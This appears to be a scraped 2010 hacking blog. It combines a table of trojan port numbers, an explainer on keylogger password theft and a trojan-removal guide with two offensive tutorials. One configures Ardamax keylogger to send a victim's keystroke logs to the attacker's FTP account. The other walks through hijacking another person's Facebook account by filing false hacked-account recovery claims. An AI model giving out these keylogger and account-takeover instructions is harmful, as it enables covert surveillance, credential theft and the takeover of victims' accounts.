456 Hackers Paradise
555 Ini-Killer, Phase Zero, Stealth Spy
666 Satanz Backdoor
1001 Silencer, WebEx
1011 Doly Trojan
1170 Psyber Stream Server, Voice
1234 Ultors Trojan
1243 SubSeven 1.0 - 1.8
1245 VooDoo Doll
1492 FTP99CMP
1600 Shivka-Burka
1807 SpySender
1981 Shockrave
1999 BackDoor 1.00-1.03
2001 Trojan Cow
2023 Ripper
2115 Bugs
2140 Deep Throat, The Invasor
2801 Phineas Phucker
3024 WinCrash
3129 Masters Paradise
3150 Deep Throat, The Invasor
3700 Portal of Doom
4092 WinCrash
4567 File Nail 1
4590 ICQTrojan
5000 Bubbel
5000 Sockets de Troie
5001 Sockets de Troie
5321 Firehotcker
5400 Blade Runner 0.80 Alpha
5401 Blade Runner 0.80 Alpha
5402 Blade Runner 0.80 Alpha
5400 Blade Runner
5401 Blade Runner
5402 Blade Runner
5569 Robo-Hack
5742 WinCrash
6670 DeepThroat
6771 DeepThroat
6969 GateCrasher, Priority
7000 Remote Grab
7300 NetMonitor
7301 NetMonitor
7306 NetMonitor
7307 NetMonitor
7308 NetMonitor
7789 ICKiller
8787 BackOfrice 2000
9872 Portal of Doom
9873 Portal of Doom
9874 Portal of Doom
9875 Portal of Doom
9989 iNi-Killer
10067 Portal of Doom
10167 Portal of Doom
10607 Coma 1.0.9
11000 Senna Spy
11223 Progenic trojan
12223 Hack´99 KeyLogger
12345 GabanBus, NetBus
12346 GabanBus, NetBus
12361 Whack-a-mole
12362 Whack-a-mole
16969 Priority
20001 Millennium
20034 NetBus 2.0, Beta-NetBus 2.01
21544 GirlFriend 1.0, Beta-1.35
22222 Prosiak
23456 Evil FTP, Ugly FTP
26274 Delta
30100 NetSphere 1.27a
30101 NetSphere 1.27a
30102 NetSphere 1.27a
31337 Back Orifice
31338 Back Orifice, DeepBO
31339 NetSpy DK
31666 BOWhack
33333 Prosiak
34324 BigGluck, TN
40412 The Spy
40421 Masters Paradise
40422 Masters Paradise
40423 Masters Paradise
40426 Masters Paradise
47262 Delta
50505 Sockets de Troie
50766 Fore
53001 Remote Windows Shutdown
54321 SchoolBus .69-1.11
61466 Telecommando
65000 Devil

Saturday, February 20, 2010

Password Hacking with Keyloggers

Once a hacker is inside your computer, he will look for those files were your login names and passwords are stored.
That's they reason why it isn't considered safe to store them inside your computer. Even when the provider tells you that it is safe. Remember than there isn't a more secure place for keeping your password than your mind.

What Methods Were Used In The Past?

In the past, one of the common practices used by hacker was using programs that tried different password combinations until it found the correct one. This method was contra rested by email providers by giving a limited number of options or by placing some security measures inside their webpage.

Other method was placing false web pages instead of the original ones. A hacker could make a user think that he is accessing his email at the webpage of his email provider. In reality, he was entering all his information to a webpage created by the hacker. This scheme isn't used any more since users have become a bit more careful and have acquired some concepts on internet security. They have started using secure pages for login which starts with "https:\\....." in the address bar.

What Are Keyloggers?
Keyloggers are specially devised programs that are installed inside a computer via a Trojan, a virus or a worm. Once inside, the keylogger will auto execute and start recording all the key strokes made by the computer user. Once a determined period of time has gone by, the keylogger will send the keystroke information to the hacker who sent this infectious software.

Then the hacker will start searching key combinations that can lead him to determine the password for determined web pages. This simple and effective method is a favorite among hackers since it can provide them with lots of private information from their victims.

Many computer users have more than one email account, especially if they use the messenger services from multiple providers, like Microsoft's Hotmail, Yahoo's Email or AOL email. It doesn't matter if you have one or many email accounts, every one of them may be a victim of a hacker. Even with the security measures imposed by the companies, Yahoo password hacking or hotmail hacking still exist. And it's very improbable that will disappear.

So, if you want to protect yourself from people who are hacking yahoo accounts or whose whole purpose in life is to do some MSN hacking, then increase the number of special characters in your password and try not to access your email account from a computer that is not yours. And that goes to IM's too. The ability for hacking yahoo messenger or any other IM provider it's a latent danger for all of us.

Friday, February 19, 2010

How To Remove A Trojan Horse Virus

Viruses are ubiquitous and dominant on the Windows platform. No matter how careful you are, there is always a chance that your computer gets infected with a virus that just won’t go away.
If you are facing a similar situation, here are a few steps you can take to make sure you get rid of the Trojan horse/virus and most of its ill effects if not all.

Scan thoroughly with the antivirus

Sounds trivial right? Why would you get infected in the first place if your antivirus could detect the virus? Well there can be a few reasons, make sure you get them out of the way. It will save you a lot of trouble:
  • Update the antivirus to the latest version, and update the virus signature database.
  • Harden the scan options, check on heuristics, potentially dangerous applications, early warning system or whatever fancy names your antivirus uses. Set the antivirus to scan within archives and choose wisely when you specify items to exclude from the scan or leave everything out for scan.
Now perform a system scan, this way you give your antivirus a better chance to detect newer viruses.

Scan the system in safe mode

Very important to do this once before you get into manually removing the virus and its effects. Sometimes the infected files might be locked by the operating system when working in the normal mode. So to increase your antivirus’ odds to detect and clean the virus, you should restart the computer, boot into safe mode and then perform a thorough scan of your system.
Keep in mind the above mentioned points as well. You can generally boot into safe mode by pressing the F8 key during boot up and choosing the safe mode option.

Use special virus removal tools

Various antivirus manufacturers offer special tools for removing viruses once your system has been infected. Try McAfee’s Stinger or Microsoft’s Malicious Software removal tool or Kaspersky’s Virus Removal Tools. These are special tools that do a great work of removing certain infections.
So once your antivirus has detected the infection, make sure to Google it, this way you can easily find specialized solutions, removal tools and advice on your situation.

Take things into your own hands

There are times when, due to various reasons, none of the above methods works. Even in such cases everything is not lost, you can still rid your computer of viruses and Trojan horses by manually deleting the offending file and attempting to nullify the effects that it caused.
The effects vary from changing mouse/keyboard settings to infecting all files in RAM, to infecting all files using a particular library to corrupting the MBR and so on. Your ability to rollback these effects no doubt depends upon how much of a computer nerd you are, but with Google, various forums and Twitter there is a good chance you can make things work for you without having to make that call to your technician.

Here are some tips that may help you:
  • Check what processes are currently running. Use task manager, make sure to show processes from all users. If you see any suspicious process name or description just Google the name and you will get all the information you need. Make sure to prevent it from running again if you think you found the problem. You can use msconfig and manage startup items to do so.
  • Use HijackThis to diagnose a problem and create a log in case you want someone else to help you with your problem.
  • Try to find the nomenclature various antivirus products use to refer to the type of infection you have on your computer. Once you know that, you will be able to find detailed step by step instructions provided by various antivirus vendors to get rid of it. It also makes it easier to search for specialized tools to get rid of the Trojan horse/virus.
All of these methods will surely help your cause. However, your ability to completely rid your computer of a particular virus would depend on how early you are able to detect it, the type of the virus and the harm it was intended to cause (sounds a lot like cancer, isn’t it?).  Always take regular backups in case something goes wrong while attempting a clean up.

How To Setup FTP account & recieve logs from Keylogger

This tutorial is for those of you who DONT know how to recieve log files from your keyloggers such as Ardamax Keylogger, Albertino Keylogger,etc....
FTP is like an online storage account. You make one so that your keylogger can send you log files there and you can download those log files and view them from where ever you are

The best ftp site according to me is
http://www.drivehq.com
1) Goto this site, and click on the sign up button in first section where it says "Online File Storage and Sharing"
The Sign up Page should look like this:

http://lh4.ggpht.com/_ZzQjrew_8Nw/S1yYAaSynpI/AAAAAAAAAEo/j-McvEjEksc/s400/aaaaaaaaaaaa.jpg 

2) Fill in the necessary details and finish sign up. Once you're done, sign into your account.
3) Click On- "New Folder".

http://lh3.ggpht.com/_ZzQjrew_8Nw/S1yYbFsO0pI/AAAAAAAAAEw/ifISJzYEbYA/s400/bbbbbbbbbbbbbb.jpg

4) Name your folder- "logs"

http://lh6.ggpht.com/_ZzQjrew_8Nw/S1yY29h-zQI/AAAAAAAAAE4/Q0a7Rt65r9I/s400/ccccccc.jpg 

The Folder Should show up like this-

http://lh3.ggpht.com/_ZzQjrew_8Nw/S1yZPttAswI/AAAAAAAAAFA/m2mcu4dSgbI/s400/dddd.jpg 

The FTP part is now done.
Open your Keylogger Application- I'll show you how to use Ardamax Keylogger to send FTP logs.


1) Open Ardamax>Right-Click System Tray Icon>>Options>>Delivery>>FTP
2) Here you type in the following:
 

http://lh6.ggpht.com/_ZzQjrew_8Nw/S1yZvWHgPiI/AAAAAAAAAFI/0Y2jkO3wKN0/s400/eee.jpg 

FTP Host: http://ftp.drivehq.com
Remote foler: \logs (you should've made this folder in your FTP account by now)
Port: 21 (This is automatically given)
Username: [your username goes here]
Password: [your password goes here]
Once done, click on TEST
click "OK" 

Now goto Control (this button's just above the FTP button).
Chose the following settings

http://lh6.ggpht.com/_ZzQjrew_8Nw/S1yajjlDilI/AAAAAAAAAFY/Lrz-I-fBYyE/s400/ggg.jpg 

AND THAT's IT! YOU're DONE SETTING UP AN FTP ACCOUT!
you will recieve log files in your drive hq account from the computer you keylogged.
Like This Tutorial? 
PM me for any problems...
Leave a comment too..plz....

Keylogger DOWNLOAD

Hack Any Facebook Account

Welcome to a tutorial on how to hack any facebook accounts, in next 24 hours, without keylogging/phishing etc.

First of all, I want to say is this is not hacking, this is called
"Reverting".

What is Reverting?
Reverting means undoing the effects of one or more edits, which normally results in the page being restored to a version that existed sometime previously.
NOTE: This tutorial is for educational purposes only, I am NOT responsible in any way for how this information is used, use it at your own risk, also you can learn how to get your account back from this.Ok, let's start:

Step 1: First of all open this link:
http://www.facebook.com/help/contact.php?show_form=account_hacked
This will be the form you will be filling out.
NOTE: Be sure you are not logged in.

Step 2: Your email address.
Simple, write your "own" email adress, or the victim you are hacking.

Step 3: Can you send and receive emails from your login email address?
Choose "No".

Step 4: Has the login email address that you normally use to log in to your account been hacked?
Choose "Yes".

Step 5: Has the login email address on your account been changed?
Choose "Yes" again.

Step 6: Full name on the account.
If you already know the full name of the victim you're going to hack, you can write it

Step 7: Email address(es) that may be affiliated with the account.

Write "No".

Step 8: Your contact email address.

Write your email adress where facebook can contact you. Example crazy@gmail.com.

Step 9: Your username (if applicable).

If you are not sure about your victim, ask him first, if he looks like confused and asking you what's that, then probably he doesn't have one.so write there "none", "don't have" or "no".

Step 10: URL (web address link) to your profile page.

You can find victim's profile page, by searching their email. login to your facebook, write their email in the search button and press Enter. After some seconds, it will appear their name, click on it and copy the URL. There are more instruction in the pictures. They look bad but that was the best I could do.

Step 11: Once you're done and pressed the Submit button a message will appear:
"Thanks, your inquiry has been forwarded to the Facebook Team."

That means, you're done and you have to wait while facebook check up your request and send you email to the email you wrote where they can contact you.

PLEASE DONT TRY ON MY ACCOUNT